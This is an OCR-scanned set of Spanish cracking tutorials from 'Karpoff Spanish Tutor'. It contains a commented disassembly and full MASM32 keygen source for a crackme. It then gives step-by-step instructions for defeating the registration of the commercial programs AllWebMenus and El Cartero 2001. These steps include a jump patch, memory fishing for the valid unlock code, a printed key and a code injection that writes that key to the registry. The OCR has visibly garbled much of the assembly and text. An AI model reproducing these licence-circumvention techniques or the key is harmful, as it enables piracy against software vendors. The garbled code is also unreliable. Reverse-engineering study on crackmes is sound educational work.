
0042D02D 0FB67418FF MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] <= Extrae caracter por caracter 

0042D032 0175F8 ADD DWORD PTR SS:[EBP-8],ES!I <= Suma el valor decimal del caracter a EBP-8 que tiene como valor inicial 1 
0042D035 43 INC EBX <= Incrementa EBX 

0042D036 — 4F DEC EDI <= Decrece EDI 

0042D037 Fl JNZ SHORT KEYME.0042D02A <= Vamos el segundo,tercero,cuarto,etc... 

0042D039 6945F87B2B0100 IMUL EAX,DWORD PTR SS:[EBP-8],12B7B_ <= EAX = EBP-8 * 12B7B 

0042D040 8945F8 MOV DWORD PTR SS:[EBP-8],EAX <= EAX tiene el valor en Hexa de el primer valor que compone el serial correcto 
0042D043 8D55FC LEA EDX, DWORD PTR SS:[EBP-4] 

0042D046 8B45F8 MOV EAX,DWORD PTR SS:[EBP-8] 

0042D049 ES0OA95FDFF CALL KEYME.00406558 <= El valor de EAX es trasladado a Decimal 

0042D04E FF75FC PUSH DWORD PTR SS: [EBP-4] 

0042D051 6830D24200 PUSH KEYME.0042D230 

0042D056 FF75E8 PUSH DWORD PTR SS:[EBP-18] 

0042D059 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 

0042D05C  BA03000000 MOV EDX,3 <= EDX recibe el valor de 3 

0042D061 E81A68FDFF CALL KEYME.00403880 <= Concatena los valores el que se acaba de cambiar a decimal y la segunda cadena de caracteres 
0042D066 8945FC MOV DWORD PTR SS:[EBP-4],EAX <= EAX traslada el valor 0042D066 a EBP-4 


Ahora formamos un tercer valor para formar ya en sí lo que es el serial, el cual al final nos quedaría así... 


NNNNNNNN-CCCCCC-NNNNNN 


A la vista de no hacer de este tutorial un crack rápido, lo que sigue ya les toca a ustedes, si ya sé, este es un crackme, pero esto que significa, significa el que ustedes realmente se quiebren la cabeza, para 
destriparlo, además para los que conocen assembler este arroz ya se coció... 


0042D069 — F765F8 MUL DWORD PTR SS:[EBP-8] 
0042D06C  F765F8 MUL DWORD PTR SS:[EBP-8] 
0042D06F  8955F8 MOV DWORD PTR SS: [EBP-8],EDX 
0042D072  C16DF805 SHR DWORD PTR SS:[EBP-8],5 
0042D076 — FF75E8 PUSH DWORD PTR SS:[EBP-18] 
0042D079 —6830D24200 PUSH KEYME.0042D230 
0042D07E  8D55D4 LEA EDX,DWORD PTR SS:[EBP-2C] 
0042D081  8B45F8 MOV EAX,DWORD PTR SS:[EBP-8] 


0042D084 E8CF94FDFF CALL KEYME.00406558 <= Convierte nuestro ultimo valor en Decimal 


0042D089 — FF75D4 PUSH DWORD PTR SS:[EBP-2C] 

0042D08C  8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 

0042D08F BA03000000 MOV EDX,3 

0042D094 E8E767FDFF CALL KEYME.00403880 <= Une todos los valores creando nuestro serial correcto 
0042D099  8D55DC LEA EDX,DWORD PTR SS:[EBP-24] 

0042D09C  8B45F4 MOV EAX,DWORD PTR SS:[EBP-C] 

0042D09F  8B80F0010000 MOV EAX,DWORD PTR DS:[EAX+1F0] 

0042DOA5  E846CDFEFF CALL KEYME.00419DFO 

0042DOAA  8B45DC MOV EAX,DWORD PTR SS:[EBP-24] <= EAX recibe nuestro serial malo 

0042DOAD  8B55E8 MOV EDX,DWORD PTR SS:[EBP-18] <= EDX recibe el serial correcto 

0042D0B0  E81B68FDFF CALL KEYME.004038DO <= Compara EAX y EDX 

0042D0B5 7511 JNZ SHORT KEYME.0042D0C8 <= Si son iguales no vamos a ver el mensaje de error, sino que continuamos al de "Buen Cracker" 
0042D0B7  E8B8AFFDFF CALL KEYME.00408074 

0042D0OBC  B83CD24200 MOV EAX,KEYME.0042D23C  ; ASCII "Serial Correcto; Buen Cracker" 


Ahora ya podemos generar el keygen y aqui tienen el código fuente en MASM32... 


.386 
.model flat, stdcall 
option casemap: none 


include c:1masm321includelwindows.inc 
include c:1masm321includeluser32.inc 
include c:1masm321includelkernel32.inc 
includelib c:1masm321libluser32. lib 
includelib c:1masm321liblkernel32.!ib 


.const 


IDD_DIALOG EQU 100 
IDC_NAME EQU 101 
IDC_SERIAL EQU 102 
IDI_ICON EQU 103 
I1DC_COPY EQU 200 
IDC_INFO EQU 201 


DigFunc PROTO : DWORD,: DWORD,: DWORD,: DWORD 
Operacion PROTO 
Clipo PROTO hWnd: HWND 


.data 


nombre db 33 dup(0),0 

blank db 10 dup(0),0 

clave db 

"MUYBIENHASDESCUBIERTOLACONSTANTEPEROTODAVIATEQUEDAPORHACERTOMANUMERITO7894378924978yparacomplicarmasminusculastambienYMASCOSASZXCVBNMÑA345" 
db "nu 


db "+SA" 
db "nu 
db "+C-*/()868% % $$:" 
do" 


db "1![1;: -DSHFSDKJFSOIU440KF] DBKSDKSFDSOIFE8983493KFLJ] NV",O 
serial db "0123456789",0 
seriall db 40 dup(0),0 
serial2 db "0123456789",0 
cadena db 33 dup(0),0 
separa db "-",0 
mifmt db "%lu",0 
minombre db "ByTESCRK",0 
aboutcap db "Crack-KeyGen-ME v1.0",0 
abouttxt db "Keygen por ByTESCRK",13,10 
db "bytescrk",13,10,13,10 
db "Cracked [RAZIEL] :)",13,10,13,10 


db "http: //granavenida.com/kfor",0 
minchar db "¡Mínimo 1 caracter!",O 
hInstance dd O 
hIcon dd O 
buff db 256 dup(?) 
hWnd HWND ? 


.code 
start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance,IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DigFunc proc hDlg: DWORD,uMsg: DWORD, wParam: DWORD,IParam: DWORD 


.1fuMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd,eax 
invoke Loadl con,hInstance,!|DI_ICON 
mov h|con,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hlcon 
invoke SendDIgltemMessageA,hWnd,|DC_NAME,EM_LIMITTEXT, 32, NULL 
invoke SetWindowText,hDlg, ADDR aboutcap 
invoke SetDlgltemText,hDlg,I|DC_ NAME, ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg, NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
.Hfax==|DC_NAME 
shr eax,16 
.ifax==EN_CHANGE 
invoke GetDlgltemTextA,hDlg,I|DC_NAME,ADDR nombre, 33 
invoke Istrlen, ADDR nombre 
.lfeax== 
invoke SetDlgltemTextA, hDlg,I|DC_SERIAL,ADDR blank 
.else 
invoke Operacion 
.lfeax== 
invoke SetDlgltemTextA, hDlg,I|DC_SERIAL,ADDR minchar 
.elseif eax==6666 
invoke SetDlgltemText,hDlg,I|DC_NAME,ADDR nombre 
.else 
invoke SetDlgltemTextA, hDlg,|DC_SERIAL,ADDR serial 
.endif 
.endif 
xor eax, eax 
ret 
.endif 
.endif 
mov edx,eax 
shr edx,16 
.Hf dx==BN_CLICKED 
.Hfax==]DC_COPY 
invoke Clipo,hDlg 
xor eax,eax 
ret 
.elseif ax==IDC_INFO 
invoke MessageBoxaA, hDlg, offset abouttxt, offset aboutcap, NULL 
xor eax,eax 
ret 
.endif 
.endif 
.endif 
xor eax,eax 


ret 

DigFunc endp 
Operacion proc 
pushad 


invoke Istrlen, offset nombre 
.¡feax<0 

popad 

mov eax,1 

ret 
.endif 


mov esi, offset serial 

mov dword ptr[esi],33323130h 
add esi,4 

mov dword ptr[esil,37363534h 
add esi,4 

mov dword ptr[esil,3938h 


mov esi, offset serial2 

mov dword ptr[esi],33323130h 
add esi,4 

mov dword ptr[esil,37363534h 
add esi,4 

mov dword ptr[esi],3938h 


mov edx, offset clave 

mov ebx,1 

mov edi, 1 

invoke Istrlen, offset nombre 
push ebp 

mov ebp,eax 


Stepo: mov esi, offset nombre 
movsx eax,byte ptr[esi+ebx-1] 
StepN: movsx ecx, byte ptr[edx+edi-1] 
$ eax==ecx 
mov ecx, offset cadena 
mov esi,eax 
invoke Istrlen, ecx 
feax>0 
add ecx,eax 
.endif 
mov dword ptr[ecx], esi 
.else 
inc edi 
cmp edi,000000d4h 
jne StepN 
.endif 
mov edi, 1 
inc ebx 
invoke Istrlen, offset nombre 
inc eax 
cmp ebx,eax 
jne StepO 


invoke Istrlen, offset cadena 
Ifeax>6 
jmp siga 
.endif 
mov edi, 1 
mov esi, offset cadena 


fill: mov ecx, offset clave 
movsx ebx, byte ptr[ecx+edi-1] 


invoke Istrlen, esi 
feax>0 

add esi,eax 
.endif 
mov dword ptr [esi],ebx 
invoke Istrlen, offset cadena 
Ifeax<6 

inc edi 

jmp fill 
.endif 


siga: 
pop ebp 
xor esi, esi 
mov dword ptr[EBP-020h], esi 
mov ebx, offset cadena 
mov esi,1 

Step1: 
mov edx, offset clave 
mov al,byte ptr[ebx] 
cmp al, byte ptr[edx+esi-1] 
jne EndA 


MOV ECX,ESI 
MOV EAX,ECX 
IMUL ECX 
MOV ECX,EAX 
SUB ECX,ESI 
ADD ECX,DWORD PTR [EBP-020h] 
MOV EAX,ECX 
MOV ECX,000000036h 
CDQ 
IDIV ECX 
MOV ESI,EDX 
INC ESI 
INC EBX 
MOV EDX, offset clave 
MOV DWORD PTR [EBP-020h],ESI 
MOVSX ECX,BYTE PTR[EDX+ESI!-1] 
mov esi, offset serial1 
invoke Istrlen, esi 
feax>0 
add esi,eax 
.endif 
feax == 6 
MOV EBX,1 
MOV DWORD PTR[EBP-8],EBX 
jmp Step2 
.endif 
mov dword ptr[esi],ecx 
MOV ESI,1 
JMP Step1 
Enda: 
INC ESI 
jmp Step1 


Step2: MOV EAX, offset cadena 
MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] 
ADD DWORD PTR [EBP-8],ESI 
INC EBX 
cmp ebx,7 
JNE Step2 
IMUL EAX,DWORD PTR [EBP-8],12B7Bh 
mov esi, offset serial 
invoke wsprintfA,esi,ADDR mifmt,eax 
MOV EBX,1 
MOV DWORD PTR[EBP-8],EBX 


Step3: MOV EAX, offset cadena 
MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] 
ADD DWORD PTR [EBP-8],ESI 
INC EBX 
cmp ebx,7 
JNE Step3 
IMUL EAX,DWORD PTR [EBP-8],12B7Bh 
XOR ECX,ECX 
MOV DWORD PTR [EBP-8],EAX 
MOV EAX,42D066h 
MOV EDX, 3 
MUL DWORD PTR [EBP-8] 
MUL DWORD PTR [EBP-8] 
MOV DWORD PTR [EBP-8],EDX 
SHR DWORD PTR [EBP-81,5 
mov eax, dword ptr [EBP- 8] 
mov esi, offset serial2 
invoke wsprintfA,esi,ADDR mifmt,eax 


invoke Istrcat, offset serial, offset separa 
invoke Istrcat, offset seriall, offset separa 
invoke Istrcat, offset seriall, offset serial2 
invoke Istrcat, offset serial, offset seriall 


popad 
ret 


Operacion endp 


Clipo proc hDlg: DWORD 
LOCAL gmem : DWORD 


invoke GlobalAlloc, GMEM_ MOVEABLE+GMEM_DDESHARE, 254 
mov gmem,eax 


invoke GlobalLock,eax 
cmp eax, NULL 

je noabra 

mov ebx, offset serial 
lea esi,dword ptr[ebx] 
mov edi, eax 

mov ecx,29 


rep movsb 


invoke OpenClipboard, hDlg 
cmp eax, TRUE 
jne noabra2 


mov eax,gmem 
invoke SetClipboardData, CF_TEXT, eax 


invoke CloseClipboard 


noabra2: 
mov eax,gmem 
invoke GlobalFree, eax 


noabra: 
ret 
Clipo endp 


end start 
ao... Final de Código----- 


Y Crack-KeyGen-MEw1.0 


Nombre: 
ByTESCRK 


Serial: 
[37643497-STAHTB-71 1881 


Copiar 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera educacional y tambien como diversión, aunque como RAZIiEL nos dice que podemos 
hacer y deshacer con el programa, realmente yo tambien los invito a hacerlo ;o)" 


Y así doy por concluído mi 15avo tutorial, saludando a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE, [Kalisto (okaruzic) "Salute"] y a todos los crackers hispanohablantes. 
Si tienes alguna duda o comentario escríbeme a: ByTESCRKGOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: 


Pagina dedicada a la divulgacion de informacion en Castellano, 


sobre 
Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


AllWebMenus v 1.3 Build ¿354 


Programa: 


PROTECCION: Unlock Code 


Descripcion: Crea menus flotantes taco de chulos para páginas web 
Dificultad: Facililla 

DOWNLOAD : http: //www.alwebmenus.com 

Herramientas: Softice, W32dasm, Hex Workshop, RegMon, Topo. 


CRACKER: AuspeX FECHA: 01/03/2002 


| INTRODUCCION 


Este soft digamos que fue el que, en cierto modo, me inicio en este mundo del cracking, pero es una historia muy 
larga para explicarla ahora. El programa que vamos a tratar esta escrito en lenguaje Visual Basic 6 y utiliza la 
librería MSVBVM60.DLL con los problemas que llevan estos programas para encontrar el código correcto mediante 
traceo (lo digo por experiencia con otros programas escritos en dicho lenguaje), aunque, algunas veces, son incluso 
más faciles de crackear de lo que parecen. Nos vamos a ayudar de las funciones que utiliza dicha librería para 
encontrar el code correcto. 


| AL ATAKE 


Abrimos el programa, lo ejecutamos. Le echamos un vistazo, y nos vamos directamente al menú de Help para ver que es lo 
que tenemos ahí. Podemos observar la opción Register AllVVebMenus. Pues nada, picamos e intentamos registramos 
metiéndole cualquier chorrada que se nos ocurra, ¿me apuesto 1000 duros a que no acertais a la primera? (si por casualidad 
alguien acertó de primera, retiro la apuesta, xD). 


Failed to register 


[X 


Bueno, pues ante esto, lo primero que a mi se me ocurrió (por que soy muy flojo) fue abrir el W32Dasm y mirar a ver si por 
casualidad encontraba la referencia a esta cadena, y de hecho tuve suerte y la encontré cuando desensamblé el ejecutable 
del programa. Os pondré el código más o menos resumido (lo más importante) de lo que me fui encontrando en los 

alrededores de la referencia: 


:005474CE FF154C104000 Call dword ptr [0040104C] 
:005474D4 83C418 add esp, 00000018 
:005474D7 663BF3 cmp si, bx 


:005474DA 0F8486000000 je 00547566 < 
chico malo que está aquí, mas abajo. 


Ahora veremos que nos manda a la zona de chico bueno saltandose la zona de 


* Reference To: MSVBVM60,  vbaVarDup, Ord:0000h 


:005474E0 8B3570124000 mov esi, dword ptr [00401270] 
:005474E6 B904000280 mov ecx, 80020004 
:005474EB 894D9C mov dword ptr [ebp-64], ecx 


* Possible StringData Ref from Code Obj ->"Failed to register" < 


titulo de la ventana de error 


:0054750A C7857CFFFFFFBCFE4100 mov dword ptr [ebp+FFFFFF7C], 0041FEBC 


:00547514 899D74FFFFFF mov dword ptr [ebp+FFFFFF74], ebx 
:00547514A FFD6 call esi 


:0054751C 8D5584 lea edx, dword ptr [ebp-7C] 
:0054751F 8D4DC4 lea ecx, dword ptr [ebp-3C] 


* Possible StringData Ref from Code Obj ->"The password you entered is not " <-----nuestro mensaje de error 
->"correct" 


:00547522 C7458CE8FE4100 mov [ebp-74], 0041FEES 


:00547529 895D84 mov dword ptr [ebp-7C], ebx 
:0054752C FFDE call esi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:005474DA(C) 


:00547566 391D785D5500 cmp dword ptr [00555D78], ebx <-----Comienza la supuesta zona de chico bueno 
:0054756C 7510 jne 0054757E 

:0054756E 68785D5500 push 00555D78 

:00547573 68784E4100 push 00414E78 


* Possible StringData Ref from Code Obj ->"pwd" <-----luego veremos que es esto 


:00547609 68C84E4100 push 00414EC8 


* Possible StringData Ref from Code Obj ->"Settings" 


:0054760E 689C4E4100 push 00414FE9C 
:00547613 52 push edx 


* Possible StringData Ref from Code Obj ->"Registration Completed" <----- ¡ Chico buenooooo ! 


| 

:00547667 C7857CFFFFFF90FF4100 mov dword ptr [ebp+FFFFFF7C], 0041FF90 
:00547671 899D74FFFFFF mov dword ptr [ebp+FFFFFF74], ebx 

:00547677 FFD6 call esi 

:00547679 8D5584 lea edx, dword ptr [ebp-7C] 

:0054767C 8D4DC4 lea ecx, dword ptr [ebp-3C] 


* Possible StringData Ref from Code Obj ->"Thank you for registering AllWebMenus!" <-----gracias tio, ajaja 
| 


Bueno, una vez visto este pequeñito resumen, se ves más o menos que es lo que se puedría intentar cambiar aquí para que 
nos registre el programa, no?, y es ese salto primero que nos mandría a la zona de chico bueno. Pués nada, lo cambiamos el 
je a ¡ne para que salte si la clave no es la correcta (creo que sería más fácil acertar la clave incorrecta que la correcta, 
verdad?), ya sabeis, se busca el desplazamiento con el W32Dasm y con el editor hexadecimal, en este caso, cambiar un 84 
por un 85). Volvemos a probar ahora. Metemos la clave que nos da la gana y que es lo que nos sale?... 


Registration Completed 


3) 


¡Mirad, nos da las gracias y todo!, pero que bueno es el infeliz. Muy bien, aparentemente todo ha salido de puta madre (jeje, 
yo ya sé que no es así), pero cuando por ejemplo nos metemos en el menú Help y picamos en About nos damos cuenta de 
que ahí sigue poniendo: This is an Unregistered Copy, ¡jur!, ¿pero si nos ha dado las gracias y todo?, ¿que habrá pasado?. 

volvemos a registrarnos (ya tenemos el salto cambiado), nos sigue dando las gracias, pero la cosa sigue sin funcionar. Bueno, 
esto es uno de los muchos programas que te demuestran que no basta con cambiar el salto que te lleva a la zona de chico 

bueno. En este caso le hemos metido una clave, que aparentemente es la correcta, pero que en realidad no nos registra, 
simplemente hacemos que nos salga el mensajito de que todo va de muy bien. Pero hay algo más, y fue como el plan B una 
vez fallado el plan A. ¿Os acordais de la referencia a una cadena pwd que vimos en el código anterior? (mirad otra vez si no 
os acordais), pues investigué eso un poquito a ver si me podría dar una pista. Resulta que aparecía más de una vez en el 
código desensamblado. ¿pero que era eso?... 


Bueno, la experiencia con otros programas del mismo tipo me hizo intentar observarlo con el programa RegMonitor con el 

cual podemos ver los movimientos que existen en el registro de Windows mientras estamos corriendo programas. Una vez 

arrancado RegMon ejecutamos el programa y observamos las entradas de registro que este toca, mirad la sorpresa que me 
llevé: 


Registry Monitor - Versión en español compilada por Demi... MIE 


Allwebme Query alueE x HKCU' Software B and BA Program Settings 4lMwebMenus!Settinas+ Main 
CloseKey HKCUSoftwareWWB and YBA, Program Settings Allu'ebMenust5eltings 
DpenkKey HKCUSoftwareWWB and WBA Program Settingst4llwebMenus! Settings 
QueryValueE x HKCUNSoftwareWWB and YBA, Program Settings 4lhMebMenus! Settings pid 
Query alueEx HKCUN Software YB and WBA Program Settings. 4 llw'ebMenust5ettingspid 
QueryW'alueE x HKCUNSoftwareWWB and WBA Program Settingsv4llebMenust5ettingsrpid 
ClosekKey HKCUNSoftwareWWB and YBA, Program Settings tAllw'ebMenus!5ettings 
DpenKey HKCUA Software WWB and YBA, Program Settings AllwebMenus! Settings 
Query alueEx HKCUN Software YB and YBA Program Settings. 4 /lM'ebimMenus,Settingspwd 
QueryW'alueE x HKCUtSoftwareWWB and WBA Program Settings vá llwebimMenustSettings*pud 
QueryValueE x HKCUSoftwareWWB and WBA Program SettingstállwebMenus! Settings puwd 
ClosekKey HKCUNSoftwareWWB and YBA Program Settings tAllwebMenus! Settings 
DpenkKey HKCUtSoftwareWWB and WBA Program Settings 4llw'ebhmMenust Settings 

Allwebme  QuerYalueE x HKCUASoftwareWWB and VBA Program SettingstAlWebMenusiSettingstamms 


| ¿Veis?, pwd es un valor que nos encontarmos en el registro. Picamos dos veces en anguna línea de estas para que nos lleve 
a esta dirección en el registro y ahí podemos ver muchos valores, parámetros, etc... que utiliza el programa para funcionar. El 
| valor pwd tiene como información la clave que le metimos y se tragó por to la cara. Hay otra que me llama mucho la atención 
y es pid que tiene el 1D del software. Parece que ya tenemos una pista más o menos clara de lo que sucede aquí. 
Posiblemente a alguno ya se le ha ocurrido algo ¿verdad?. Nosotros cuando le metimos la clave, se la tragó, y la grabó en el 
registro, pero una vez que intentamos ver si estamos registrados o no, nos dice que nanai de la china, y ¿por que? porque 
esa no es la verdadera clave, porque cuando intenta ver si estamos registrados o no, de alguna manera vuelve a mirar en el 
registro, genera la verdadera clave y la compara con esta que tenemos aquí, y claro no es la buena. Eso fue fácil deducirlo 
cuando arranqué el programa, me metí en el menu Help y pique en About, y todo esto con RegMon cargado. Pasó que volvía 
| amirar los valores de PID y PWD. Pues entonces ya está, aunque se trage las claves que le metamos eso no nos sirve de 
nada, pues siempre mirará en el registro y pillará la clave de ahí. pid posiblemente lo utilice para generar la clave clave 
| correcta, pues cada vez que va a comparar le mete mano en el registro. ¿Y ahora qué?, pués lo que a mi se me ocurrió fue lo 
siguiente: ya sabemos como trabaja, es decir, tanto cuando arranca, como cuando se mira en About y en otras funciones 
más del programa, este genera internamente la clave, luego le mete mano a la que se supone que hay guardada en el 
registro, y las compara de alguna manera, pues entonces por que no probar la función __VBASTRCMP, que utiliza Visual 
Basic para comparar cadenas?, recordad que el programa está hecho en Visual Basic 6. Probemos a poner un punto de 
ruptura en dicha función y sacar de nuevo la ventanita de About. Para ello debemos de tener arrancado Soft-lce y meternos 
| dentro con CTRL+D, poner: bpx __ vbastrcmp y pulsamos intro, luego F5 para seguir, y entonces sacamos la ventanita. 
¡Plass! el sice revienta como era de esperar. Una vez dentro, intenté mirar en las direcciones que indicaban los registros, para 
ver si por casualidad veia la clave correcta, tenía que estar por ahí. La primera vez sólo vi mi clave, y digo la primera vez por 
que saltó varias veces en dicha función, concretamente 3 veces. Una cosa importante, esto sucede cuando tienes un pwd en 
| el registro, si no lo tienes sólo saltará 1 vez (todo esto lo probé). Pués eso, me lie a mirar las direcciones a donde aputaban 
los registros y entonces es cuando pezqué la clave correcta paseándose por la memoria. No había más que verla para darse 
cuenta de que se trataba de una clave: CCU-94H-] 6É, ¡joder no me digais que no tiene to la pinta!. Siempre que veais cosas 
así os la apuntais y la probais a ver si furula. Pues ya está, la probé y furuló a las mil maravillas. Ahora en About aparecía: 
Registered Copy, ya estaba realmente registrado el programa. 


RETOMANDO EL TUTORIAL 


Llegado este punto habría terminado el tutorial, sino fuese por que acabo de leer uno sobre WinZip, escrito por CKENER, y 
que me ha dado una idea estupenda para este programa. Fijaos, a CKENER se le ocurrió redirigir en cierto modo la dirección 
del mensaje de error de forma que en vez de sacar dicho mensaje, sacase la clave correcta. ¿Os dais cuenta?, es como 
| crearse el KeyGen pero utilizando el propio código del programa (para que implementarlo si ya viene en dicho programiilla, 
| jeje). Bueno, pues yo más o menos intenté hacer lo mismo, pero no sabía como pasarle a la función RTCMSGBOX la dirección 
| del código correcto, lo intenté, pero es que realmente cuando estudié la forma en que pasaba el mensaje de error, cambié la 
| dirección para que saliese la clave, pero salía el mensajito en blanco. Bueno, en resumidas cuentas, que tuve problemas para 
hacer esto mismo con esta función de Visual Basic, asi que se me ocurrió otra cosa, quizas más rápida aún. ¿Recordais que 
| cuando le cambiábamos ese saltopara llevarnos a la zona de chico bueno, nos grababa la clave que le habíamos metido en el 
registro, aunque fuese la errónea?, bueno, pués lo que vamos a hace es que en vez de que nos grabe la chorra de password, 
| nos meta diréctamente la pass correcta, de esta manera nosotros mismos hacemos que nos registre con la clave correcta que 
pezcamos (nosotros se la quitamos y luego se la vendemos, jeje). ¿Y como hacemos eso?, pués lo primero de todo es 
estudiar la forma en que graba el código en el registro. Veamos este trozo de programa desensamblado: 


|* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| |:005475EE(C) 

1 

| :00547602 8B4DE4 mov ecx, dword ptr [ebp-1C] <-----en ecx la dirección de nuestra clave pachanguera 
| :00547605 8B55E8 mov edx, dword ptr [ebp-18] <-----la dirección de la cadena "AllVWebMenus" 

| :00547608 51 push ecx <-----pushea nuestra clave 


|* Possible StringData Ref from Code Obj ->"pwd" 


| 
| :00547609 68C84E4100 push 00414EC8 <-----"pwa" 


|* Possible StringData Ref from Code Obj ->"Settings" 


Ñ 
| :0054760E 689C4E4100 push 00414E9C <-----"Setting" 
| :00547613 52 push edx <-----ya sabemos que pushea 


|* Reference To: MSVBVM60.rtcSaveSetting, Ord:02B2h 


Ñ 
| :00547614 FF1508104000 Call dword ptr [00401008] <-----a guardar se ha dicho, jeje 


Pués lo que yo hice fue lo siguiente: Hice un injerto de código utilizando un programa que se llama Topo, programado por 
MrCrimson, vesión 1.2, ¿pero para que ese injerto?, pués muy sencillo, lo que pretendía era mandar como parámetro, en vez 
| 


de mi falsa clave, la clave correcta quenerada internamente, pero había el problema de que la clave era destruida antes de 
llegar aquí y también se perdía la dirección. Luego el injerto de cógido era para guardar la verdadera pass en alguna zona de 
memoria libre que no fuese modificada y luego mandar esa dirección como paramáetro de la función RTCSAVESETTING. Y 
este fue mi código injertado: 


INICIO: 
OS mov cl,b ¡longitud de la clave -> 12 


mov edi,555360 ¡dirección que elegí para guardar la clave buena 
mov esi,[ebp-14] ;aquí tenemos nuestro tesoro 


Sii mov al, [esi] ¡transladamos la pass 


anna mov [edi], al 
inc esi ;incrementamos dos veces por el tema del formato widechar: a us p e x,¿veis? formato VB 


Ahora sólo quedaba pasarle la dirección 555360: en vez de hacer mov ecx,[ebp-1C], hacer mov ecx,555360. Pero cuando lo 

probé la cosa no funcionó del todo, y digo que no funcionó del todo por que sólo guardó la primera letra de la pass correcta. 

¿Que podría pasar?, pues muy sencillo, estudiando el código interno de la llamada RTCSAVESETTING, observé que también 

pasaba un número a un registro, haciéndole un desplazamiento hacia la derecha y convirtiéndolo en otro que coincidía con el 

número de caracteres que tenía la clave, por lo tanto aquí estaba el problema, también tenía que pasar dicho número que se 
encontraba a 4 bytes por debajo de la clave y era 16, que al desplazarlo un bits hacia la derecha se convierte en B que 
equivale a 11. Recordad la clave que obtuvimos al principio CCU-94H-] 6E, tiene 11 caracteres, ¿¿veis?, pues ya está, sólo 

quedaba insertar un poco de más código que hiciera algo como esto: 


INICIO: 


APS mov ecx, 555360 ;esta es la línea modificada dentro del códifo, cambiada por: mov ecx,[ebp-1c] 
aran mov edx,[ebp-18] ;todo lo que sigue no ha sido modificado 
Sao push 00414ec8 


Y se acabó lo que se daba. Ahora, con todos estos cambios, si le metemos cualquier tontería, genera internamente la 
clave correcta (hace la comparación), la pezcamos, la guardamos en un sitio seguro y más tarde la pasamos como 
parámetro en la función que escribe en el registro, y el solito nos registra el programa. 


NOTAS FINALES 


Sólo quería comentar una cosa, y es que seguramente todo esto puede parecer algo engorroso para crackear el programa 
¿verdad?, pero para mi es bastante más divertido, y a la vez educativo, que un simple cambio de salto. El hecho de conseguir 
comprender el código es lo que me hace seguir en este mundillo tan apasionante, por eso no lo dejo en un simple saltito. En 
mi opinión, siempre hay que buscar la manera de crackear un programa, no de la forma más complicada posible como podría 

parecer este caso, sino de aquella de la que puedas aprender más. 


Por último, quiero dedicar este Tutorial a un amigo, Cesalv, quien de un modo indirecto, me inició en este arte del Cracking, y 
bueno, tambien a todos mis profesores, y estos son todo aquél que escribe tutos para las páginas de KFOR y Karpoff 
incluidos ellos mismos, por supuesto. 


CORREO DEL MENDA: auspextGAwanadoo.es 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


El Cartero 2001 


Name / Serial 

Encontrar el serial correcto 

El Cartero es un pequeño programa que se encargara de leer el correo electrónico 
automáticamente cada cierto tiempo que tu le indicarás en la configuración del mismo; 
permite hasta un máximo de 10 cuentas. 


Aficionado. 


http://www.sigeval.com/ec 


TRW2000, W32dasmVB 


ByTESCRK FECHA: 26/11/2001 


INTRODUCCION 


Bueno, pues primero decirles que tal vez esta sea una manera fácil de encontrar un serial, sin 
embargo, tal vez no sea la correcta o tal vez aplique únicamente a este programa en todo caso algo 
que casi nunca falla con algunos programas escritos en Visual Basic es el SmartCheck de Numega, 
para ver su uso pueden ver muchos tutoriales en el apartado para SmartCheck en la sección 
Crackeando de la web de Karpoff. Asimismo pueden consultar el manual de SiLvEr StOrM llamado 
"Crackeando Programas en Visual Basic". Pero mejor pasemos AL ATAKE 


AL ATAKE 


Abramos el programa y vemos una bonita caja de texto con los campos NOMBRE: y CÓDIGO: ingresamos los 
valores que deseemos en mi caso "ByTESCRK" para el campo nombre y para el campo código "19770424", 
hacemos clic en Registrar 


"REGISTRO INCORRECTO" 


Lógico ¿no?, ahora abramos el W32DASM y busquemos la cadena que nos ha devuelto un error cuando 
hemos dado a Registrar, si ya lo hemos encontrado encontraremos lo siguiente 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0043B4AD(C) <= Investigaremos por aquí 


| 

:0043B77B 8D953CFFFFFF lea edx, dword ptr [ebp+FFFFFF3C] 
:0043B781 8D8D7CFFFFFF lea ecx, dword ptr [ebp+FFFFFF7C] 
:0043B787 89BD54FFFFFF mov dword ptr [ebp+FFFFFF54], edi 
:0043B78D 89B54CFFFFFF mov dword ptr [ebp+FFFFFF4C], esi 
:0043B793 89BD64FFFFFF mov dword ptr [ebp+FFFFFF64], edi 
:0043B799 89B55CFFFFFF mov dword ptr [ebp+FFFFFF5C], esi 
:0043B79F 89BD74FFFFFF mov dword ptr [ebp+FFFFFF74], edi 
:0043B7A5 89B56CFFFFFF mov dword ptr [ebp+FFFFFF6C], esi 


* Possible StringData Ref from Code Obj ->"REGISTRO INCORRECTO" 


| 
:0043B7AB C78544FFFFFF50A84100 mov dword ptr [ebp+FFFFFF441, 00414850 <= Aqui caemos 
:0043B7B5 C7853CFFFFFFO8000000 mov dword ptr [ebp+FFFFFF3C], 00000008 


Al ir a 0043B4AD nos encontraremos con este código que no nos dice nada, pero buscaremos más arriba para 
ver si encontramos algo interesante, cómo sabemos y espero que ya se hayan leído el manual de SiLvEr 
StOrM ya sabrán lo que es un __ vbaStrCmp, entonces buscaremos estas cadenas para ver si están cerca. 


* Reference To: MSVBVM60.__ vbaFreeObjList, Ord: 0000h 


| 

:0043B4A2 E8C36AFCFF Call 00401F6A 

